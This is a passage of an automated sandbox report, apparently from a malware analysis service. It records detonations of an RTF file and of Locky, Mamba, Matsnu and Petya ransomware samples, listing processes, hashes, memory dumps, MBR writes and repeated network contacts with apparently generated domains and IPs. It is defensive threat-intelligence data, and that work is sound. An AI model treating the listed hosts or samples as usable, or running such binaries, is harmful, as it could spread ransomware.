| PID 5060 wrote to memory of 1364 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 5060 wrote to memory of 1364 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\splwow64.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206_OFkNP1kKL9.rtf" /o ""
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
Network
| Country | Destination | Domain | Proto |
| DE | 84.200.16.242:80 | tcp | |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| DE | 84.200.16.242:80 | tcp | |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
Files
memory/5060-0-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp
memory/5060-3-0x00007FFA6A44D000-0x00007FFA6A44E000-memory.dmp
memory/5060-1-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp
memory/5060-2-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp
memory/5060-5-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp
memory/5060-4-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp
memory/5060-6-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-9-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-8-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-7-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-11-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-12-0x00007FFA27CD0000-0x00007FFA27CE0000-memory.dmp
memory/5060-13-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-10-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-14-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-17-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-20-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-19-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-22-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-21-0x00007FFA27CD0000-0x00007FFA27CE0000-memory.dmp
memory/5060-18-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-16-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-15-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
memory/5060-30-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win10v2004-20240611-en
Max time kernel
1799s
Max time network
1804s
Command Line
Signatures
Locky
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 8.8.8.8:53 | greootc.eu | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
| IE | 86.104.134.144:80 | tcp | |
| US | 8.8.8.8:53 | nwohmkgabcexy.uk | udp |
| US | 8.8.8.8:53 | bmltj.yt | udp |
| US | 8.8.8.8:53 | oclkiawk.pm | udp |
| US | 162.249.64.234:80 | greootc.eu | tcp |
| US | 8.8.8.8:53 | tektkyupmj.be | udp |
| US | 8.8.8.8:53 | htknqmpojpkrl.yt | udp |
Files
memory/2272-0-0x0000000000C40000-0x0000000000C44000-memory.dmp
memory/2272-1-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-3-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-5-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-8-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-9-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-10-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-12-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-14-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-15-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-17-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-19-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-21-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-23-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-25-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-27-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-28-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-31-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-32-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-34-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-35-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-36-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-38-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-39-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-41-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-42-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-44-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-45-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-46-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-48-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-50-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-52-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-54-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-56-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-58-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-60-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-62-0x0000000000400000-0x00000000007D1000-memory.dmp
memory/2272-64-0x0000000000400000-0x00000000007D1000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win7-20240221-en
Max time kernel
1565s
Max time network
1568s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Mamba\131.exe"
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win10v2004-20240508-en
Max time kernel
1720s
Max time network
1733s
Command Line
Signatures
Program crash
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe
"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Matsnu\Matsnu-MBRwipingRansomware_1B2D2A4B97C7C2727D571BBF9376F54F_Inkasso Rechnung vom 27.05.2013 .exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2420 -ip 2420
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2420 -s 368
Network
Files
Analysis: behavioral26
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:00
Platform
win10v2004-20240508-en
Max time kernel
2s
Max time network
9s
Command Line
Signatures
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Petya\Ransomware.Petya\26b4699a7b9eeb16e76305d843d4ab05e94d43f3201436927e13b3ebafa90739.exe
